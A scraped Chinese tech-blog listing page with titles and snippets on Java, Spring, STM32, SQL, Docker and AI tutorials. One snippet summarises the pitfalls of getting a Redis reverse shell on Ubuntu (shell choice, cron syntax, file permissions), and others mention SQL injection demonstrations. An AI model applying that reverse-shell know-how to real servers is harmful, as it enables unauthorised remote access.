<a class="tag" taget="_blank" href="/search/Java%E5%AE%9E%E6%88%98%28%E8%BF%9B%E9%98%B6%E7%89%88%29/1.htm">Java实战(进阶版)</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/Java%E9%9B%B6%E5%9F%BA%E7%A1%80%E5%85%A5%E9%97%A8/1.htm">Java零基础入门</a><a class="tag" taget="_blank" href="/search/Java%E5%B9%B6%E5%8F%91/1.htm">Java并发</a><a class="tag" taget="_blank" href="/search/%E7%BA%BF%E7%A8%8B%E6%B1%A0/1.htm">线程池</a><a class="tag" taget="_blank" href="/search/%E5%A4%9A%E7%BA%BF%E7%A8%8B%E7%AF%87/1.htm">多线程篇</a>
                        <div>本文收录于「Java进阶实战」专栏，专业攻坚指数级提升，希望能够助你一臂之力，帮你早日登顶实现财富自由；同时，欢迎大家关注&&收藏&&订阅！持续更新中，up！up！up！！环境说明：Windows10+IntelliJIDEA2021.3.2+Jdk1.8本文目录前言摘要正文何为线程池？为什么需要线程池？线程池的好处线程池使用场景如何创建线程池？线程池的常见配置源码解析案例分享案例代码演示案例运行</div>
                    </li>
                    <li><a href="/article/1950192848225759232.htm"
                           title="AIGC内容生成实战：如何用ChatGPT+DALL·E打造高转化内容" target="_blank">AIGC内容生成实战：如何用ChatGPT+DALL·E打造高转化内容</a>
                        <span class="text-muted">AI大模型应用工坊</span>
<a class="tag" taget="_blank" href="/search/AI%E5%A4%A7%E6%A8%A1%E5%9E%8B%E5%BC%80%E5%8F%91%E5%AE%9E%E6%88%98/1.htm">AI大模型开发实战</a><a class="tag" taget="_blank" href="/search/AIGC/1.htm">AIGC</a><a class="tag" taget="_blank" href="/search/chatgpt/1.htm">chatgpt</a><a class="tag" taget="_blank" href="/search/ai/1.htm">ai</a>
                        <div>AIGC内容生成实战：如何用ChatGPT+DALL·E打造高转化内容关键词：AIGC、ChatGPT、DALL·E、内容生成、高转化营销、多模态协同、提示词工程摘要：随着AIGC（人工智能生成内容）技术的爆发式发展，ChatGPT（文本生成）与DALL·E（图像生成）的组合已成为内容创作领域的“黄金搭档”。本文将深度解析二者的协同原理，结合实战案例演示从需求分析到内容落地的全流程，并揭示提升内容</div>
                    </li>
                    <li><a href="/article/1950179866523529216.htm"
                           title="大学社团管理系统（11831）" target="_blank">大学社团管理系统（11831）</a>
                        <span class="text-muted">codercode2022</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/boot/1.htm">boot</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/echarts/1.htm">echarts</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/cloud/1.htm">cloud</a><a class="tag" taget="_blank" href="/search/sentinel/1.htm">sentinel</a><a class="tag" taget="_blank" href="/search/java-rocketmq/1.htm">java-rocketmq</a>
                        <div>有需要的同学，源代码和配套文档领取，加文章最下方的名片哦一、项目演示项目演示视频二、资料介绍完整源代码（前后端源代码+SQL脚本）配套文档（LW+PPT+开题报告）远程调试控屏包运行三、技术介绍Java语言SSM框架SpringBoot框架Vue框架JSP页面Mysql数据库IDEA/Eclipse开发四、项目截图有需要的同学，源代码和配套文档领取，加文章最下方的名片哦!</div>
                    </li>
                    <li><a href="/article/1950170663763374080.htm"
                           title="【STM32编码器接口测速】实现测速功能" target="_blank">【STM32编码器接口测速】实现测速功能</a>
                        <span class="text-muted">jingjing~</span>
<a class="tag" taget="_blank" href="/search/%E5%B5%8C%E5%85%A5%E5%BC%8F%E5%88%86%E4%BA%AB/1.htm">嵌入式分享</a><a class="tag" taget="_blank" href="/search/stm32/1.htm">stm32</a><a class="tag" taget="_blank" href="/search/%E5%8D%95%E7%89%87%E6%9C%BA/1.htm">单片机</a><a class="tag" taget="_blank" href="/search/%E5%B5%8C%E5%85%A5%E5%BC%8F%E7%A1%AC%E4%BB%B6/1.htm">嵌入式硬件</a>
                        <div>演示视频：STM32编码接口测速_哔哩哔哩_bilibili一、前言在电机控制与运动系统开发中，速度检测是一个核心环节。本次我们使用STM32F103的TIM3编码器接口模式配合定时器中断，实现对增量型编码器的转速测量，并通过OLED实时显示当前速度。本文适合具有基础STM32外设编程能力的同学阅读，使用环境如下：主控芯片：STM32F103C8T6（或相同系列）开发环境：KeilMDK显示模块：</div>
                    </li>
                    <li><a href="/article/1950169145177862144.htm"
                           title="如何运用深度学习打造高效AI人工智能系统" target="_blank">如何运用深度学习打造高效AI人工智能系统</a>
                        <span class="text-muted">AI智能探索者</span>
<a class="tag" taget="_blank" href="/search/AI/1.htm">AI</a><a class="tag" taget="_blank" href="/search/Agent/1.htm">Agent</a><a class="tag" taget="_blank" href="/search/%E6%99%BA%E8%83%BD%E4%BD%93%E5%BC%80%E5%8F%91%E5%AE%9E%E6%88%98/1.htm">智能体开发实战</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a><a class="tag" taget="_blank" href="/search/%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0/1.htm">深度学习</a><a class="tag" taget="_blank" href="/search/ai/1.htm">ai</a>
                        <div>如何运用深度学习打造高效AI人工智能系统关键词：深度学习、AI系统、神经网络、模型优化、实战开发摘要：本文将从深度学习的核心概念出发，结合生活实例和代码实战，系统讲解如何构建高效AI系统。我们会拆解数据准备、模型设计、训练优化、部署落地的全流程，揭秘“数据-模型-训练-推理”的协同机制，并通过具体案例演示从0到1开发AI系统的关键技巧，帮助开发者掌握打造高效AI系统的底层逻辑。背景介绍目的和范围在</div>
                    </li>
                    <li><a href="/article/1950161706533580800.htm"
                           title="SQL笔记纯干货" target="_blank">SQL笔记纯干货</a>
                        <span class="text-muted">AI入门修炼</span>
<a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a>
                        <div>软件：DataGrip2023.2.3，phpstudy_pro,MySQL8.0.12目录1.DDL语句（数据定义语句）1.1数据库操作语言1.2数据表操作语言2.DML语句（数据操作语言）2.1增删改2.2题2.3备份表3.DQL语句（数据查询语言）3.1查询操作3.2题一3.3题二4.多表详解4.1一对多4.2多对多5.多表查询6.窗口函数7.拓展:upsert8.sql注入攻击演示9.拆表</div>
                    </li>
                    <li><a href="/article/1950158303287898112.htm"
                           title="零数学基础理解AI核心概念：梯度下降可视化实战" target="_blank">零数学基础理解AI核心概念：梯度下降可视化实战</a>
                        <span class="text-muted">九章云极AladdinEdu</span>
<a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a><a class="tag" taget="_blank" href="/search/gpu%E7%AE%97%E5%8A%9B/1.htm">gpu算力</a><a class="tag" taget="_blank" href="/search/%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0/1.htm">深度学习</a><a class="tag" taget="_blank" href="/search/pytorch/1.htm">pytorch</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/%E8%AF%AD%E8%A8%80%E6%A8%A1%E5%9E%8B/1.htm">语言模型</a><a class="tag" taget="_blank" href="/search/opencv/1.htm">opencv</a>
                        <div>点击“AladdinEdu，同学们用得起的【H卡】算力平台”，H卡级别算力，按量计费，灵活弹性，顶级配置，学生专属优惠。用Python动画演示损失函数优化过程，数学公式具象化读者收获：直观理解模型训练本质，破除"数学恐惧症"当盲人登山者摸索下山路径时，他本能地运用了梯度下降算法。本文将用动态可视化技术，让你像感受重力一样理解AI训练的核心原理——无需任何数学公式推导。一、梯度下降：AI世界的"万有</div>
                    </li>
                    <li><a href="/article/1950144189979226112.htm"
                           title="Spring Security OAuth2.0在分布式系统中的安全实践" target="_blank">Spring Security OAuth2.0在分布式系统中的安全实践</a>
                        <span class="text-muted"></span>

                        <div>引言分布式系统架构下，安全认证与授权面临跨服务、高并发、多租户等挑战。SpringSecurity与OAuth2.0的结合为微服务安全提供了标准化解决方案。分布式系统中的安全挑战跨服务身份认证的复杂性令牌管理的可扩展性问题多租户场景下的权限隔离需求防止CSRF、XSS等常见攻击SpringSecurityOAuth2.0核心架构授权服务器设计@EnableAuthorizationServer配置</div>
                    </li>
                    <li><a href="/article/1950127164250714112.htm"
                           title="ubuntu的redis反弹shell总结" target="_blank">ubuntu的redis反弹shell总结</a>
                        <span class="text-muted">chanra</span>
<a class="tag" taget="_blank" href="/search/%E8%90%8C%E6%96%B0%E9%9A%8F%E7%AC%94/1.htm">萌新随笔</a><a class="tag" taget="_blank" href="/search/ubuntu/1.htm">ubuntu</a><a class="tag" taget="_blank" href="/search/redis/1.htm">redis</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a>
                        <div>ubuntu的redis反弹shell总结ubuntu要执行有三点：1、ubuntu的默认执行命令的为/bin/dash，我们使用bash-i肯定是弹不了的。2、ubuntu计划任务运行有语法要求，redis写入的文件存在缓存数据，导致语法错误无法运行计划任务。3、文件需要是600rw权限，权限不对也不能运行，不过我直接写入貌似就是600rw。参考链接：http://www.vkxss.top/2</div>
                    </li>
                    <li><a href="/article/1950125273672380416.htm"
                           title="3步搞定群晖NAS Synology Drive远程同步Obsidian笔记" target="_blank">3步搞定群晖NAS Synology Drive远程同步Obsidian笔记</a>
                        <span class="text-muted"></span>

                        <div>文章目录1.简介1.1软件特色演示：2.使用免费群晖虚拟机搭建群晖SynologyDrive服务，实现局域网同步2.1安装并设置SynologyDrive套件2.1局域网内同步文件测试3.内网穿透群晖SynologyDrive，实现异地多端同步3.1安装Cpolar步骤4.实现固定TCP地址同步1.简介之前我们介绍过如何免费多端同步Zotero科研文献管理软件，使用了群晖NAS虚拟机和WebDav</div>
                    </li>
                    <li><a href="/article/1950121870707716096.htm"
                           title="大厂95%面试人不懂的易错点：strlen和sizeof 的底层博弈，大部分人踩过的内存陷阱 一文吃透 strlen/sizeof 的本质区别（附 30 + 代码演示 从崩溃到精通！" target="_blank">大厂95%面试人不懂的易错点：strlen和sizeof 的底层博弈，大部分人踩过的内存陷阱 一文吃透 strlen/sizeof 的本质区别（附 30 + 代码演示 从崩溃到精通！</a>
                        <span class="text-muted"></span>

                        <div>1揭开c语言内存底裤：strlensizeof区别（上）是否曾被C语言中strlen和sizeof这两个“磨人精”搞得一头雾水？它们一个号称能测“长度”，一个号称能测“大小”，可当你把它们用在字符串和字符数组上时，结果却常常让你大跌眼镜，甚至引发诡异的程序崩溃！就像你和豆包AI的对话中，那两个看似无辜的字符数组：chara8[]="hello";chara9[]={'h','e','l','l',</div>
                    </li>
                    <li><a href="/article/1950105484497317888.htm"
                           title="【Python】PyJWT：轻松实现 JSON Web Token (JWT) 网络令牌的生成与验证" target="_blank">【Python】PyJWT：轻松实现 JSON Web Token (JWT) 网络令牌的生成与验证</a>
                        <span class="text-muted">@Unity打怪升级</span>
<a class="tag" taget="_blank" href="/search/Python/1.htm">Python</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/json/1.htm">json</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/pip/1.htm">pip</a><a class="tag" taget="_blank" href="/search/ipython/1.htm">ipython</a>
                        <div>PyJWT是一个用Python实现的轻量级库，用于处理JSONWebToken(JWT)。JWT是一种安全的方式，用来表示双方之间经过签名的令牌，通常用于认证和授权场景。PyJWT简化了JWT的生成和验证过程，使得开发者能够轻松地在Python项目中集成JWT功能。在这篇博客中，我们将深入介绍PyJWT，展示如何生成、解码和验证JWT令牌，并且会通过代码示例演示如何在实际项目中使用PyJWT进行认</div>
                    </li>
                    <li><a href="/article/1950046482811908096.htm"
                           title="掌握SQL注入：漏洞演示与防护策略实战源代码" target="_blank">掌握SQL注入：漏洞演示与防护策略实战源代码</a>
                        <span class="text-muted">May Wei</span>

                        <div>本文还有配套的精品资源，点击获取简介：SQL注入是一个影响Web应用和数据库安全的漏洞。通过本项目源代码演示，开发者能深入理解SQL注入的工作机制及其攻击方法。文档和源代码示例将指导如何通过构造恶意SQL语句执行非授权数据库操作，以及如何通过实践学习防止此类攻击，包括安全编码、输入验证、错误处理、数据库权限设置和日志监控等。1.SQL注入概念和攻击方法1.1SQL注入漏洞的基本原理1.1.1SQL</div>
                    </li>
                    <li><a href="/article/1950020001654173696.htm"
                           title="Web前端交互利用Python跟大模型操作" target="_blank">Web前端交互利用Python跟大模型操作</a>
                        <span class="text-muted">哥本哈士奇</span>
<a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E4%BA%A4%E4%BA%92/1.htm">交互</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a>
                        <div>Web前端交互利用Python跟大模型操作一个简单的演示，如何把大模型应用集成到自己的应用场景当中。这里的场景我们模拟的是在吃鸡游戏中，一个作战计划，是否符合老六的行为规范。吃鸡游戏已经风靡很多年，游戏里每个人的游戏风格都不一样，有喜欢钢枪的，有喜欢随机应变的，也有喜欢当老六苟分的。每种风格的游戏方式以及游戏里的行为都不同，所以这里将演示如何应用大模型，去判断一个人的游戏方式，是否符合一个老六的行</div>
                    </li>
                    <li><a href="/article/1949982674546388992.htm"
                           title="基于群晖Synology Drive的Obsidian笔记远程同步方案" target="_blank">基于群晖Synology Drive的Obsidian笔记远程同步方案</a>
                        <span class="text-muted">咕咕日志</span>
<a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a>
                        <div>文章目录1.简介1.1软件特色演示：2.使用免费群晖虚拟机搭建群晖SynologyDrive服务，实现局域网同步2.1安装并设置SynologyDrive套件2.1局域网内同步文件测试3.内网穿透群晖SynologyDrive，实现异地多端同步3.1安装Cpolar步骤4.实现固定TCP地址同步1.简介之前介绍过如何免费多端同步Zotero科研文献管理软件，在文章中分享了群晖Nas虚拟机安装包，使</div>
                    </li>
                    <li><a href="/article/1949950147890835456.htm"
                           title="Matlab医学图像配准工具箱使用指南" target="_blank">Matlab医学图像配准工具箱使用指南</a>
                        <span class="text-muted">远方之巅</span>

                        <div>本文还有配套的精品资源，点击获取简介：医学图像配准是一个关键的IT技术，特别是对于不同条件下的医学图像分析至关重要。’fordanic/image-registration’是一个Matlab工具箱，它提供了易于使用的接口和算法，助力研究人员和工程师高效准确地完成医学图像配准工作。工具箱内包含了多个示例脚本，详细演示了二维和三维空间中的图像配准步骤，包括图像预处理、特征检测、相似性度量、几何变换模</div>
                    </li>
                    <li><a href="/article/1949920012890337280.htm"
                           title="MCP架构对比演示文档" target="_blank">MCP架构对比演示文档</a>
                        <span class="text-muted">it_czz</span>
<a class="tag" taget="_blank" href="/search/%E6%9E%B6%E6%9E%84/1.htm">架构</a>
                        <div>MCP架构对比演示文档1.核心架构对比1.1本系统：自包含式MCP架构外部客户端SpringBoot应用容器应用层业务层MCP实现层数据处理层浏览器客户端第三方MCP客户端RESTAPI客户端网段计算引擎地理位置APIOpenAI集成内置MCP服务器内置MCP客户端IP网段服务SpringAI服务RESTAPI接口MCPWebSocket接口图1.1本系统自包含式MCP架构说明：这个架构图展示了我</div>
                    </li>
                    <li><a href="/article/1949870072625426432.htm"
                           title="Spring Boot 与 Spring Cloud Stream：事件驱动与消息流处理的完美结合！" target="_blank">Spring Boot 与 Spring Cloud Stream：事件驱动与消息流处理的完美结合！</a>
                        <span class="text-muted">bug菌¹</span>
<a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/boot/1.htm">boot</a><a class="tag" taget="_blank" href="/search/%E5%90%8E%E7%AB%AF/1.htm">后端</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/Spring/1.htm">Spring</a><a class="tag" taget="_blank" href="/search/Boot/1.htm">Boot</a><a class="tag" taget="_blank" href="/search/%E4%BA%8B%E4%BB%B6%E9%A9%B1%E5%8A%A8/1.htm">事件驱动</a><a class="tag" taget="_blank" href="/search/%E6%B6%88%E6%81%AF%E6%B5%81%E5%A4%84%E7%90%86/1.htm">消息流处理</a>
                        <div>本文收录于《滚雪球学SpringBoot》，专门攻坚指数提升，2025年国内最系统+最强（更新中）。  本专栏致力打造最硬核SpringBoot从零基础到进阶系列学习内容，均为全网独家首发，打造精品专栏，专栏持续更新中…欢迎大家订阅持续学习。如果想快速定位学习，可以看这篇【SpringBoot教程导航帖】,你想学习的都被收集在内，快速投入学习！！两不误。演示环境说明：开发工具：IDEA2021.3</div>
                    </li>
                    <li><a href="/article/1949870069966237696.htm"
                           title="Spring Boot 与 Spring Cloud Gateway：构建高效的API网关！" target="_blank">Spring Boot 与 Spring Cloud Gateway：构建高效的API网关！</a>
                        <span class="text-muted">bug菌¹</span>
<a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/boot/1.htm">boot</a><a class="tag" taget="_blank" href="/search/%E5%90%8E%E7%AB%AF/1.htm">后端</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/Spring/1.htm">Spring</a><a class="tag" taget="_blank" href="/search/Boot/1.htm">Boot</a><a class="tag" taget="_blank" href="/search/Spring/1.htm">Spring</a><a class="tag" taget="_blank" href="/search/Cloud/1.htm">Cloud</a><a class="tag" taget="_blank" href="/search/Gateway/1.htm">Gateway</a><a class="tag" taget="_blank" href="/search/API%E7%BD%91%E5%85%B3/1.htm">API网关</a>
                        <div>本文收录于《滚雪球学SpringBoot》，专门攻坚指数提升，2025年国内最系统+最强（更新中）。  本专栏致力打造最硬核SpringBoot从零基础到进阶系列学习内容，均为全网独家首发，打造精品专栏，专栏持续更新中…欢迎大家订阅持续学习。如果想快速定位学习，可以看这篇【SpringBoot教程导航帖】,你想学习的都被收集在内，快速投入学习！！两不误。演示环境说明：开发工具：IDEA2021.3</div>
                    </li>
                    <li><a href="/article/1949870069563584512.htm"
                           title="Spring Boot 与 WebSocket：实时双向通信的实现！" target="_blank">Spring Boot 与 WebSocket：实时双向通信的实现！</a>
                        <span class="text-muted"></span>

                        <div>本文收录于《滚雪球学SpringBoot》，专门攻坚指数提升，2025年国内最系统+最强（更新中）。  本专栏致力打造最硬核SpringBoot从零基础到进阶系列学习内容，均为全网独家首发，打造精品专栏，专栏持续更新中…欢迎大家订阅持续学习。如果想快速定位学习，可以看这篇【SpringBoot教程导航帖】,你想学习的都被收集在内，快速投入学习！！两不误。演示环境说明：开发工具：IDEA2021.3</div>
                    </li>
                    <li><a href="/article/1949859342622715904.htm"
                           title="深入理解 Spring IOC：从概念到实践" target="_blank">深入理解 Spring IOC：从概念到实践</a>
                        <span class="text-muted">十六点五</span>
<a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/%E5%90%8E%E7%AB%AF/1.htm">后端</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                        <div>目录一、引言二、什么是IOC？2.1控制反转的本质2.2类比理解三、SpringIOC的核心组件3.1IOC容器的分类3.2Bean的生命周期四、依赖注入（DI）的三种方式4.1构造器注入4.2Setter方法注入4.3注解注入（推荐）五、案例演示：从XML配置到注解驱动5.1XML配置方式5.2注解驱动方式（推荐）六、SpringIOC的优势与注意事项6.1核心优势6.2注意事项七、总结一、引言</div>
                    </li>
                    <li><a href="/article/1949736674896441344.htm"
                           title="简约时装网店网站开发#网页制作 #网页设计 #网站建设" target="_blank">简约时装网店网站开发#网页制作 #网页设计 #网站建设</a>
                        <span class="text-muted">黄菊华老师</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E9%A1%B5%E6%A8%A1%E6%9D%BF/1.htm">网页模板</a><a class="tag" taget="_blank" href="/search/%E7%AE%80%E7%BA%A6%E6%97%B6%E8%A3%85%E7%BD%91%E5%BA%97/1.htm">简约时装网店</a>
                        <div>博主介绍：黄菊华老师《Vue.js入门与商城开发实战》《微信小程序商城开发》图书作者，CSDN博客专家，在线教育专家，CSDN钻石讲师；专注网站制作、小程序开发、软件开发和大学生毕业设计教育、辅导。所有项目都配有从入门到精通的基础知识视频课程，学习后应对毕业设计答辩，提供核心代码讲解，答辩指导。项目配有对应开发文档、开题报告、任务书、PPT等，提供毕业设计论文辅导。项目都录了发布和功能操作演示视频</div>
                    </li>
                    <li><a href="/article/1949731747872698368.htm"
                           title="“一门深入”：穿透妄念的修行密钥" target="_blank">“一门深入”：穿透妄念的修行密钥</a>
                        <span class="text-muted">109702008</span>
<a class="tag" taget="_blank" href="/search/%E6%9D%82%E8%B0%88/1.htm">杂谈</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a>
                        <div>在杭州灵隐寺的晨钟暮鼓中，一位居士十年如一日持诵《楞严咒》，却在某日参访高僧时突然痛哭："为何诵咒千遍，烦恼依旧？"这个叩问直指佛教修行的核心命题——如何将形式化的修行转化为真实的解脱智慧。《楞严经》提出的"一门深入"法门，恰似一柄斩断妄念的智慧之剑，为现代人指明了解脱迷思的实践路径。一、耳根圆通：穿透声尘的禅观艺术观世音菩萨在楞严会上演示的耳根圆通法门，展现了一套精密的心灵操作系统。当钟声穿透灵</div>
                    </li>
                    <li><a href="/article/1949720150290788352.htm"
                           title="高级07-Java安全编程：保护你的应用免受攻击" target="_blank">高级07-Java安全编程：保护你的应用免受攻击</a>
                        <span class="text-muted">Jinkxs</span>
<a class="tag" taget="_blank" href="/search/Java%E9%AB%98%E7%BA%A7%E7%AF%87/1.htm">Java高级篇</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                        <div>引言在当今的数字时代，应用程序的安全性已成为软件开发过程中不可忽视的重要环节。Java作为一门广泛应用于企业级应用开发的编程语言，其安全性问题尤其受到关注。无论是在Web应用、移动应用还是后端服务中，Java开发者都需要面对各种潜在的安全威胁，如SQL注入、跨站脚本攻击（XSS）、跨站请求伪造（CSRF）、身份验证漏洞等。因此，掌握Java安全编程的最佳实践，不仅能够提升应用程序的健壮性，还能有效</div>
                    </li>
                    <li><a href="/article/1949683832403849216.htm"
                           title="初识 docker [上]" target="_blank">初识 docker [上]</a>
                        <span class="text-muted">这就是佬们吗</span>
<a class="tag" taget="_blank" href="/search/docker/1.htm">docker</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a><a class="tag" taget="_blank" href="/search/%E5%AE%B9%E5%99%A8/1.htm">容器</a>
                        <div>docker常用命令补充：docker和容器自启动演示命名别名数据卷挂载命令演示环节:查看挂载详情挂载本地目录或文件演示环节：演示一下MySQL的匿名数据卷docker常用命令命令说明中文文档地址dockerpull拉取镜像dockerpulldockerpush推送镜像到DockerRegistrydockerpushdockerimages查看本地镜像dockerimagesdockerrmi</div>
                    </li>
                    <li><a href="/article/1949678160488493056.htm"
                           title="从配置到演示：使用 WLLVM 将复杂项目编译成一个 bitcode 文件，并使用 SVF 工具进行分析" target="_blank">从配置到演示：使用 WLLVM 将复杂项目编译成一个 bitcode 文件，并使用 SVF 工具进行分析</a>
                        <span class="text-muted"></span>

                        <div>使用SVF进行代码分析时，需要一个bitcode文件（.bc），但对于复杂的项目，一般只能得到分散的bitcode文件。GitHub上的项目WholeProgramLLVM旨在解决这个问题，使用该工具将整个项目编译成单个bitcode文件。点这里：WLLVM官方教程点这里：SVF官方教程在实际操作时，我没有完全按照官方教程来，因为年代有些久远了。1.安装conda并创建所需的Python环境直接参</div>
                    </li>
                    <li><a href="/article/1949675764353921024.htm"
                           title="宝塔开放php openssl,[教程]Centos宝塔面板升级openssl增强nginxSSL安全性，openssl开启Http/2,Centos升级openssl..." target="_blank">宝塔开放php openssl,[教程]Centos宝塔面板升级openssl增强nginxSSL安全性，openssl开启Http/2,Centos升级openssl...</a>
                        <span class="text-muted">weixin_39956353</span>
<a class="tag" taget="_blank" href="/search/%E5%AE%9D%E5%A1%94%E5%BC%80%E6%94%BEphp/1.htm">宝塔开放php</a><a class="tag" taget="_blank" href="/search/openssl/1.htm">openssl</a>
                        <div>由于本站是采用的Centos7+宝塔面板搭建的LNMP环境，但是Centos7默认的openssl版本又太低，根据“漏洞参考这里：https://www.trustasia.com/OpenSSL-CVE-2016-2107-Padding-Oracle”查看这篇文章发现openssl低版本已经有一堆漏洞了，所以就萌生了升级openssl版本的想法。配置完后如图：openssl版本低会导致无论你怎</div>
                    </li>
                    <li><a href="/article/1949665931206651904.htm"
                           title="探索Python中的六边形架构：Hexagonal Architecture 实例" target="_blank">探索Python中的六边形架构：Hexagonal Architecture 实例</a>
                        <span class="text-muted">戴艺音</span>

                        <div>探索Python中的六边形架构：HexagonalArchitecture实例在这个高度模块化和可扩展性的时代，软件架构的设计变得至关重要。今天，我们要介绍一个精彩的开源项目，它演示了如何在Python中实现六边形架构（也称为端口与适配器架构），结合Flask框架和SqlAlchemyORM，为你的应用带来强大的灵活性和测试性。项目介绍这个项目（hexagonal-architecture-pyt</div>
                    </li>
                    <li><a href="/article/1949631145897422848.htm"
                           title="【笔记】加速 uv 安装：系统环境变量配置国内镜像源" target="_blank">【笔记】加速 uv 安装：系统环境变量配置国内镜像源</a>
                        <span class="text-muted">AITechLab</span>
<a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a><a class="tag" taget="_blank" href="/search/PyCharm/1.htm">PyCharm</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a><a class="tag" taget="_blank" href="/search/uv/1.htm">uv</a><a class="tag" taget="_blank" href="/search/windows/1.htm">windows</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a>
                        <div>使用Conda工具链创建UV本地虚拟环境全记录——基于《Python多版本与开发环境治理架构设计》-CSDN博客命令行创建UV环境及本地化实战演示——基于《Python多版本与开发环境治理架构设计》的最佳实践-CSDN博客加速uv包安装：Windows系统环境变量配置国内镜像源一、为什么要配置环境变量加速uvuv作为高效Python包管理工具，默认从官方PyPI源（Simpleindex）拉取依赖</div>
                    </li>
                                <li><a href="/article/18.htm"
                                       title="jQuery 跨域访问的三种方式 No 'Access-Control-Allow-Origin' header is present on the reque" target="_blank">jQuery 跨域访问的三种方式 No 'Access-Control-Allow-Origin' header is present on the reque</a>
                                    <span class="text-muted">qiaolevip</span>
<a class="tag" taget="_blank" href="/search/%E6%AF%8F%E5%A4%A9%E8%BF%9B%E6%AD%A5%E4%B8%80%E7%82%B9%E7%82%B9/1.htm">每天进步一点点</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0%E6%B0%B8%E6%97%A0%E6%AD%A2%E5%A2%83/1.htm">学习永无止境</a><a class="tag" taget="_blank" href="/search/%E8%B7%A8%E5%9F%9F/1.htm">跨域</a><a class="tag" taget="_blank" href="/search/%E4%BC%97%E8%A7%82%E5%8D%83%E8%B1%A1/1.htm">众观千象</a>
                                    <div>XMLHttpRequest cannot load http://v.xxx.com. No 'Access-Control-Allow-Origin' header is present on the requested resource. Origin 'http://localhost:63342' is therefore not allowed access. test.html:1
</div>
                                </li>
                                <li><a href="/article/145.htm"
                                       title="mysql 分区查询优化" target="_blank">mysql 分区查询优化</a>
                                    <span class="text-muted">annan211</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E5%88%86%E5%8C%BA/1.htm">分区</a><a class="tag" taget="_blank" href="/search/%E4%BC%98%E5%8C%96/1.htm">优化</a><a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a>
                                    <div>


分区查询优化

  引入分区可以给查询带来一定的优势，但同时也会引入一些bug.
  
  分区最大的优点就是优化器可以根据分区函数来过滤掉一些分区，通过分区过滤可以让查询扫描更少的数据。
  所以，对于访问分区表来说，很重要的一点是要在where 条件中带入分区，让优化器过滤掉无需访问的分区。
  
  可以通过查看explain执行计划，是否携带 partitions</div>
                                </li>
                                <li><a href="/article/272.htm"
                                       title="MYSQL存储过程中使用游标" target="_blank">MYSQL存储过程中使用游标</a>
                                    <span class="text-muted">chicony</span>
<a class="tag" taget="_blank" href="/search/Mysql%E5%AD%98%E5%82%A8%E8%BF%87%E7%A8%8B/1.htm">Mysql存储过程</a>
                                    <div>DELIMITER $$ 
DROP PROCEDURE IF EXISTS getUserInfo $$ 
CREATE PROCEDURE getUserInfo(in date_day datetime)--&nbsp;-- 实例-- 存储过程名为：getUserInfo-- 参数为：date_day日期格式:2008-03-08--&nbsp;&nbsp;&nbsp; BEGINdecla</div>
                                </li>
                                <li><a href="/article/399.htm"
                                       title="mysql 和 sqlite 区别" target="_blank">mysql 和 sqlite 区别</a>
                                    <span class="text-muted">Array_06</span>
